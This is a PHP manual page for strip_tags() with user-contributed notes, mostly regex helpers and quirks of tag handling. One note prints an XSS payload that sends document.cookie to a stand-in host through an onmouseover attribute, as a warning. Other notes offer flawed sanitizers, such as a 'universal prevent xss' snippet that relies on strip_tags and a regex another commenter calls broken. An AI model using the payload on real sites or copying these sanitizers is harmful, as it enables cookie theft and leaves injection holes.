strip_tags

(PHP 4, PHP 5)

strip_tags - Strip HTML and PHP tags from a string

Description

string strip_tags ( string $str [, string $allowable_tags ] )

This function tries to return a string with all NUL bytes, HTML tags, and PHP tags stripped from the given str. It uses the same tag-stripping engine as fgetss().

Parameters

str

The input string.

allowable_tags

You can use the optional second parameter to specify tags that should not be stripped.

Note:

HTML comments and PHP tags are also stripped. This behavior is hardcoded and cannot be changed with allowable_tags.

Note:

This parameter should not contain whitespace. strip_tags() sees a tag as a case-insensitive string between < and the first whitespace or >. This means that strip_tags("<br/>", "<br>") returns an empty string.
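
As a small illustration of the case-insensitive matching described in the note, the following sketch keeps an upper-case <B> tag when only '<b>' is allowed. The input string and variable names are made up for this example and are not part of the manual.

```php
<?php
// Illustrative input; the variable names are assumptions made for this sketch.
$input = '<B>Bold</B> and <i>italic</i>';

// Tag names in allowable_tags are matched case-insensitively,
// so '<b>' also keeps <B>...</B>; <i> is not listed and is removed.
$result = strip_tags($input, '<b>');

echo $result, "\n"; // <B>Bold</B> and italic
```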

Return Values

Returns the stripped string.

Changelog

Version Description
5.0.0 strip_tags() is now binary safe.
4.3.0 HTML comments are now always stripped.

Examples

Example #1 strip_tags() example

<?php
$text = '<p>Test-Absatz.</p><!-- Kommentar --> <a href="#fragment">Anderer Text</a>';
echo strip_tags($text);
echo "\n";

// Allow <p> and <a>
echo strip_tags($text, '<p><a>');
?>

The above example will output:

Test-Absatz. Anderer Text
<p>Test-Absatz.</p> <a href="#fragment">Anderer Text</a>

Notes

Warning

Because strip_tags() does not actually validate the HTML, partial or broken tags can result in the removal of more text/data than expected.
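
A short sketch of how this can look in practice. The strings below are illustrative only; they show that a "<" followed directly by a non-space character is treated as the start of a tag, so text up to the next ">" (or to the end of the string, if there is none) is removed.

```php
<?php
// Illustrative strings, not taken from the manual.
$spaced   = 'a < b and c > d'; // "<" followed by a space is not treated as a tag
$unspaced = 'a<b and c>d';     // "<b and c>" looks like a tag and is removed
$unclosed = 'total<10 items';  // no closing ">": the rest of the string is dropped

$r1 = strip_tags($spaced);     // 'a < b and c > d'
$r2 = strip_tags($unspaced);   // 'ad'
$r3 = strip_tags($unclosed);   // 'total'

var_dump($r1, $r2, $r3);
```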

Warning

This function does not modify any attributes on the tags that you allow using allowable_tags. This includes the style and onmouseover attributes, which a malicious user may abuse when posting text that will be shown to other users.
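
One common way to sidestep the attribute problem, when the markup does not need to be rendered, is to escape the input with htmlspecialchars() instead of stripping it. The sketch below assumes UTF-8 input and uses a made-up string; it is an illustration, not a recommendation from the manual.

```php
<?php
// Illustrative user input with an event-handler attribute.
$userInput = '<p onmouseover="alert(1)">hover me</p>';

// strip_tags() keeps the attribute on the allowed <p> tag untouched.
$stripped = strip_tags($userInput, '<p>');

// Escaping instead of stripping turns the whole markup into inert text.
$escaped = htmlspecialchars($userInput, ENT_QUOTES, 'UTF-8');

echo $stripped, "\n"; // <p onmouseover="alert(1)">hover me</p>
echo $escaped, "\n";  // &lt;p onmouseover=&quot;alert(1)&quot;&gt;hover me&lt;/p&gt;
```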


User Contributed Notes 17 notes

up
32
Kenji
7 months ago
A word of warning!!
Do NOT use "admin at automapit dot com"s regex. It's broken:

"lalala <b<b>> lala </b<b>>"

will be stripped into

"lalala <b> lala </b>"

I CANNOT overstate the severity of the security issues you are introducing with code like this! Don't use it, stay safe.
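
To make the failure mode concrete, here is a minimal sketch. It uses a simplified tag pattern ('@<[^<>]*>@', an assumption standing in for the regex being criticized) and a hypothetical helper, strip_tags_repeated(), that reapplies the pattern until the string stops changing. This only illustrates why a single pass is insufficient; it is not a complete sanitizer.

```php
<?php
// Hypothetical helper for illustration: reapply a single-pass tag regex
// until the string no longer changes.
function strip_tags_repeated($html)
{
    do {
        $previous = $html;
        $html = preg_replace('@<[^<>]*>@', '', $html);
    } while ($html !== $previous);

    return $html;
}

$input = 'lalala <b<b>> lala </b<b>>';

// One pass removes only the inner tags and leaves new tags behind.
$singlePass = preg_replace('@<[^<>]*>@', '', $input);

// Repeating the pass removes the tags that the first pass exposed.
$repeated = strip_tags_repeated($input);

var_dump($singlePass); // "lalala <b> lala </b>"
var_dump($repeated);   // "lalala  lala "
```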
up
28
CEO at CarPool2Camp dot org
5 years ago
Note the different outputs from different versions of the same tag:

<?php // striptags.php
$data = '<br>Each<br/>New<br />Line';
$new  = strip_tags($data, '<br>');
var_dump($new);  // OUTPUTS string(21) "<br>EachNew<br />Line"
?>

<?php // striptags.php
$data = '<br>Each<br/>New<br />Line';
$new  = strip_tags($data, '<br/>');
var_dump($new); // OUTPUTS string(16) "Each<br/>NewLine"
?>

<?php // striptags.php
$data = '<br>Each<br/>New<br />Line';
$new  = strip_tags($data, '<br />');
var_dump($new); // OUTPUTS string(11) "EachNewLine"
?>
up
15
mariusz.tarnaski at wp dot pl
6 years ago
Hi. I made a function that removes the HTML tags along with their contents:

Function:
<?php
function strip_tags_content($text, $tags = '', $invert = FALSE) {

  // Collect the tag names listed in $tags, e.g. '<b><i>' gives array('b', 'i')
  preg_match_all('/<(.+?)[\s]*\/?[\s]*>/si', trim($tags), $tags);
  $tags = array_unique($tags[1]);

  if (is_array($tags) AND count($tags) > 0) {
    if ($invert == FALSE) {
      // Remove every element except the listed ones
      return preg_replace('@<(?!(?:'. implode('|', $tags) .')\b)(\w+)\b.*?>.*?</\1>@si', '', $text);
    }
    else {
      // Remove only the listed elements
      return preg_replace('@<('. implode('|', $tags) .')\b.*?>.*?</\1>@si', '', $text);
    }
  }
  elseif ($invert == FALSE) {
    // No tags listed: remove every element together with its content
    return preg_replace('@<(\w+)\b.*?>.*?</\1>@si', '', $text);
  }
  return $text;
}
?>

Sample text:
$text = '<b>sample</b> text with <div>tags</div>';

Result for strip_tags($text):
sample text with tags

Result for strip_tags_content($text):
text with

Result for strip_tags_content($text, '<b>'):
<b>sample</b> text with

Result for strip_tags_content($text, '<b>', TRUE):
text with <div>tags</div>

I hope someone finds it useful :)
up
11
bzplan at web dot de
2 years ago
Given HTML code like this:

<?php
$html = '
<div>
<p style="color:blue;">color is blue</p><p>size is <span style="font-size:200%;">huge</span></p>
<p>material is wood</p>
</div>
';
?>

with <?php $str = strip_tags($html); ?>
... the result is:

$str = 'color is bluesize is huge
material is wood';

Notice: the words 'blue' and 'size' run together :(
and the line breaks are still in the new string $str.

If you need a space between the words (and no line breaks),
use my function: <?php $str = rip_tags($html); ?>
... the result is:

$str = 'color is blue size is huge material is wood';

The function:

<?php
// --------------------------------------------------------------

function rip_tags($string) {

    // ----- remove HTML TAGs -----
    $string = preg_replace('/<[^>]*>/', ' ', $string);

    // ----- remove control characters -----
    $string = str_replace("\r", '', $string);    // --- remove carriage returns
    $string = str_replace("\n", ' ', $string);   // --- replace with space
    $string = str_replace("\t", ' ', $string);   // --- replace with space

    // ----- remove multiple spaces -----
    $string = trim(preg_replace('/ {2,}/', ' ', $string));

    return $string;

}

// --------------------------------------------------------------
?>

the KEY is the regex pattern: '/<[^>]*>/'
instead of strip_tags()
... then remove control characters and multiple spaces
:)
up
2
obeyer at popsugar dot com
10 months ago
actually, for PHP 5.4.19, if you want to add line breaks <br> to allowable tags, you should use "<br>". Both <br/> and <br /> in allowable tags won't do anything, and line breaks will be stripped
up
1
bnt dot gloria at outlook dot com
4 months ago
With allowable_tags, strip_tags() is not safe.

<?php

$str = "<p onmouseover=\"window.location='http://www.theBad.com/?cookie='+document.cookie;\"> don't mouseover </p>";
$str = strip_tags($str, '<p>');
echo $str; // DISPLAY: <p onmouseover="window.location='http://www.theBad.com/?cookie='+document.cookie;"> don't mouseover </p>

?>
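
If some tags must stay, one possible mitigation is to remove every attribute from the tags that survive strip_tags(). The sketch below is an assumption-laden illustration: strip_tags_and_attributes() is a hypothetical helper, it relies on the DOM extension being available, and it does not handle character encodings beyond plain ASCII input.

```php
<?php
// Hypothetical helper: keep the allowed tags but drop all of their attributes.
// Assumes the DOM extension is loaded and the input is plain ASCII.
function strip_tags_and_attributes($html, $allowed = '<p>')
{
    $clean = strip_tags($html, $allowed);

    $doc = new DOMDocument();
    $previous = libxml_use_internal_errors(true); // silence parser warnings
    $doc->loadHTML('<div>' . $clean . '</div>');  // wrap the fragment in one root
    libxml_clear_errors();
    libxml_use_internal_errors($previous);

    // The first <div> in document order is the wrapper added above.
    $root = $doc->getElementsByTagName('div')->item(0);
    foreach ($root->getElementsByTagName('*') as $element) {
        while ($element->attributes->length > 0) {
            $element->removeAttribute($element->attributes->item(0)->nodeName);
        }
    }

    // Serialize the children of the wrapper, not the wrapper itself.
    $out = '';
    foreach ($root->childNodes as $child) {
        $out .= $doc->saveHTML($child);
    }
    return $out;
}

$str  = "<p onmouseover=\"window.location='http://www.theBad.com/';\"> don't mouseover </p>";
$safe = strip_tags_and_attributes($str, '<p>');
echo $safe, "\n";
```

Dropping all attributes is deliberately blunt; an allow-list of attributes per tag would be a natural refinement.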
up
2
mshaffer
1 year ago
Below was a note on "strip_tags" page that got removed off of PHP.net ... I found this note useful, and use the code in parsing before "stripping tags" ... I don't know why in the world you would delete this one, but keep others ... your review system is a bit disturbing ...

On your page you have a warning about how data may be lost, but you delete a user-contributed comment that helps prevent that?

======================

aleksey at favor dot com dot ua 24-Feb-2011 01:06

strip_tags destroys all the HTML after a tag with invalid attributes, such as <img src="/images/image.jpg""> (look, there is an odd quote before the >).

So I wrote a function that fixes unsafe attributes and replaces odd " and ' quotes with &quot; and &#39;.

<?php
function fix_unsafe_attributes($s) {
  $out = '';
  while (preg_match('/<([A-Za-z])[^>]*?>/', $s, $i, PREG_OFFSET_CAPTURE)) { // find where the tag begins
    $i = $i[1][1]+1;
    $out.= substr($s, 0, $i);
    $s = substr($s, $i);

    // scan attributes and find odd " and '
    while (((($i1 = strpos($s, '"')) || 1) && (($i2 = strpos($s, '\'')) || 1)) && ($i1 !== false || $i2 !== false) &&
           (($i = (int)(($i1 !== false) && ($i2 !== false) ? ($i1 < $i2 ? $i1 : $i2) : ($i1 == false ? $i2 : $i1))) !== false) &&
           ((($c = strpos($s, '>')) === false) || ($i < $c))) {

      $c = $s[$i];
      if (($i < 1) || ($s[$i-1] != '=')) {
        $out.= substr($s, 0, $i).($s[$i] == '"' ? '&quot;' : '&#39;'); // replace odd " and '
        $s = substr($s, $i+1);
      } else {
        $i++;
        $out.= substr($s, 0, $i);
        $s = substr($s, $i);

        if (($i = strpos($s, $c)) !== false) {
          $i++;
          $out.= substr($s, 0, $i);
          $s = substr($s, $i);
        }
      }
    }
  }
  return $out.$s;
}
?>

Maybe this function could be rewritten as a simple regular expression, but I had no luck doing that quickly.
up
3
tom at cowin dot us
4 years ago
With most web based user input of more than a line of text, it seems I get 90% 'paste from Word'. I've developed this fn over time to try to strip all of this cruft out. A few things I do here are application specific, but if it helps you - great, if you can improve on it or have a better way - please - post it...

<?php

function strip_word_html($text, $allowed_tags = '<b><i><sup><sub><em><strong><u><br>')
{
    mb_regex_encoding('UTF-8');
    //replace MS special characters first
    $search = array('/&lsquo;/u', '/&rsquo;/u', '/&ldquo;/u', '/&rdquo;/u', '/&mdash;/u');
    $replace = array('\'', '\'', '"', '"', '-');
    $text = preg_replace($search, $replace, $text);
    //make sure _all_ html entities are converted to the plain ascii equivalents - it appears
    //in some MS headers, some html entities are encoded and some aren't
    $text = html_entity_decode($text, ENT_QUOTES, 'UTF-8');
    //try to strip out any C style comments first, since these, embedded in html comments, seem to
    //prevent strip_tags from removing html comments (MS Word introduced combination)
    if (mb_stripos($text, '/*') !== FALSE) {
        //mb_ereg patterns take no delimiters; the 'm' option lets '.' match newlines
        $text = mb_eregi_replace('/\*.*?\*/', '', $text, 'm');
    }
    //introduce a space into any arithmetic expressions that could be caught by strip_tags so that they won't be
    //stripped: '<1' becomes '< 1' (note: somewhat application specific)
    $text = preg_replace(array('/<([0-9]+)/'), array('< $1'), $text);
    $text = strip_tags($text, $allowed_tags);
    //eliminate extraneous whitespace from start and end of line, or anywhere there are two or more spaces, convert it to one
    $text = preg_replace(array('/^\s\s+/', '/\s\s+$/', '/\s\s+/u'), array('', '', ' '), $text);
    //strip out inline css and simplify style tags
    $search = array('#<(strong|b)[^>]*>(.*?)</(strong|b)>#isu', '#<(em|i)[^>]*>(.*?)</(em|i)>#isu', '#<u[^>]*>(.*?)</u>#isu');
    $replace = array('<b>$2</b>', '<i>$2</i>', '<u>$1</u>');
    $text = preg_replace($search, $replace, $text);
    //on some of the newer MS Word exports, where you get conditionals of the form 'if gte mso 9', etc., it appears
    //that whatever is in one of the html comments prevents strip_tags from eradicating the html comment that contains
    //some MS Style Definitions - this last bit gets rid of any leftover comments
    $num_matches = preg_match_all("/\<!--/u", $text, $matches);
    if ($num_matches) {
        $text = preg_replace('/\<!--(.)*--\>/isu', '', $text);
    }
    return $text;
}
?>
up
0
pietro777
5 months ago
$data = '<br>Each<br/>New<br />Line';
$new  = strip_tags($data, '<br />||<br/>||<br>');
var_dump($new); // OUTPUTS string(26) "<br>Each<br/>New<br />Line"
up
-1
kai at froghh dot de
5 years ago
A function that decides whether < is the start of a tag or a less-than / less-than-or-equal sign:

<?php
function lt_replace($str){
    return preg_replace("/<([^[:alpha:]])/", '&lt;\\1', $str);
}
?>

It's to be used before strip_tags().
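
One caveat worth illustrating: because "/" is not a letter, the pattern above also appears to escape the "<" of closing tags such as </b>. The following sketch shows a hypothetical variant, lt_escape() (the name and the pattern are assumptions, not part of the note), that leaves "<" alone when it is followed by a letter, "/", "!" or "?".

```php
<?php
// Hypothetical variant of lt_replace() for illustration.
function lt_escape($str)
{
    // Escape "<" unless it could begin a start tag, end tag,
    // comment/doctype, or PHP/XML processing instruction.
    return preg_replace('/<(?![A-Za-z\/!?])/', '&lt;', $str);
}

$input   = '1<5 and <b>bold</b>';
$escaped = lt_escape($input);      // '1&lt;5 and <b>bold</b>'
$result  = strip_tags($escaped);   // '1&lt;5 and bold'

echo $result, "\n";
```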
up
-3
admin at automapit dot com
8 years ago
<?php
function html2txt($document){
    $search = array(
        '@<script[^>]*?>.*?</script>@si',  // Strip out javascript
        '@<[\/\!]*?[^<>]*?>@si',           // Strip out HTML tags
        '@<style[^>]*?>.*?</style>@siU',   // Strip style tags properly
        '@<![\s\S]*?--[ \t\n\r]*>@'        // Strip multi-line comments including CDATA
    );
    $text = preg_replace($search, '', $document);
    return $text;
}
?>

This function turns HTML into text... strips tags, comments spanning multiple lines including CDATA, and anything else that gets in its way.

It's a Frankenstein function I made from bits picked up on my travels through the web, thanks to the many who have unwittingly contributed!
up
-2
cesar at nixar dot org
8 years ago
Here is a recursive function for strip_tags like the one shown on the stripslashes manual page.

<?php
function strip_tags_deep($value)
{
  return is_array($value) ?
    array_map('strip_tags_deep', $value) :
    strip_tags($value);
}

// Example
$array = array('<b>Foo</b>', '<i>Bar</i>', array('<b>Foo</b>', '<i>Bar</i>'));
$array = strip_tags_deep($array);

// Output
print_r($array);
?>
up
-2
sERGE-01
11 months ago
Fix for my Example2.
If the text does not have allowed tags, $out_text is empty. Fix:

<?php
$out_text = "";
$ofs = 0;
if (preg_match_all('#</?('.$tags_allowed.')\b([^><]*>)#sim', $in_text, $matches, PREG_OFFSET_CAPTURE))
{
    foreach ($matches[0] as $tag)
    {
        $out_text .= htmlentities(substr($in_text, $ofs, $tag[1] - $ofs), ENT_NOQUOTES, "cp1251");
        $out_text .= $tag[0];
        $ofs = $tag[1] + strlen($tag[0]);
    }
}
$out_text .= htmlentities(substr($in_text, $ofs), ENT_NOQUOTES, "cp1251"); // end of text
?>
up
-3
salavert at~ akelos
8 years ago
<?php
/**
 * Works like PHP function strip_tags, but it only removes selected tags.
 * Example:
 *     strip_selected_tags('<b>Person:</b> <strong>Salavert</strong>', 'strong') => <b>Person:</b> Salavert
 */
function strip_selected_tags($text, $tags = array())
{
    $args = func_get_args();
    $text = array_shift($args);
    $tags = func_num_args() > 2 ? array_diff($args, array($text)) : (array)$tags;
    foreach ($tags as $tag) {
        if (preg_match_all('/<'.$tag.'[^>]*>(.*)<\/'.$tag.'>/iU', $text, $found)) {
            $text = str_replace($found[0], $found[1], $text);
        }
    }

    return $text;
}
?>

Hope you find it useful,

Jose Salavert
up
-2
sERGE-01
11 months ago
My strip_tags:

1) Simple removal of all disallowed tags. Broken tags remain unchanged:
<?php
$tags_allowed = "a|b|i|s|u|br";
$in_text = "<b>Bold</b><table><tr><td>Table</td></tr></table><br><i>Italic>></i><div>Div</div>";

$out_text = preg_replace('#</?(?!('.$tags_allowed.'))\b([^><]*>)#sim', "", $in_text);

print "Example 1:<br>";
print htmlentities($out_text)."<br>";
?>
-------------------------------
Example 1:
<b>Bold</b>Table<br><i>Italic>></i>Div
-------------------------------

2) This example keeps all allowed tags and escapes the rest of the text with the htmlentities() function:
<?php
// getting all of the allowed tags with their offsets
if (preg_match_all('#</?('.$tags_allowed.')\b([^><]*>)#sim', $in_text, $matches, PREG_OFFSET_CAPTURE))
{
    $out_text = "";
    $ofs = 0;
    foreach ($matches[0] as $tag)
    {
        // text before allowed tag
        $out_text .= htmlentities(substr($in_text, $ofs, $tag[1] - $ofs), ENT_NOQUOTES, "cp1251");
        $out_text .= $tag[0]; // next allowed tag
        $ofs = $tag[1] + strlen($tag[0]);
    }
    // adding end of text
    $out_text .= htmlentities(substr($in_text, $ofs), ENT_NOQUOTES, "cp1251");
}

print "Example 2:<br>";
print htmlentities($out_text)."<br>";
?>
-------------------------------
Example 2:
<b>Bold</b>&lt;table&gt;&lt;tr&gt;&lt;td&gt;Table&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;<br>
<i>Italic&gt;&gt;</i>&lt;div&gt;Div&lt;/div&gt;
-------------------------------
up
-7
andy
8 months ago
<?php
//***    Universal prevent xss  ***
//   place this in top of script to prevent xss on your site
$_GET=array_map("strip_tags",$_GET);
$_POST=array_map("strip_tags",$_POST);
?>
up
-19
brettz9 AAT yah
5 years ago
Works on shortened <?...?> syntax and thus also will remove XML processing instructions.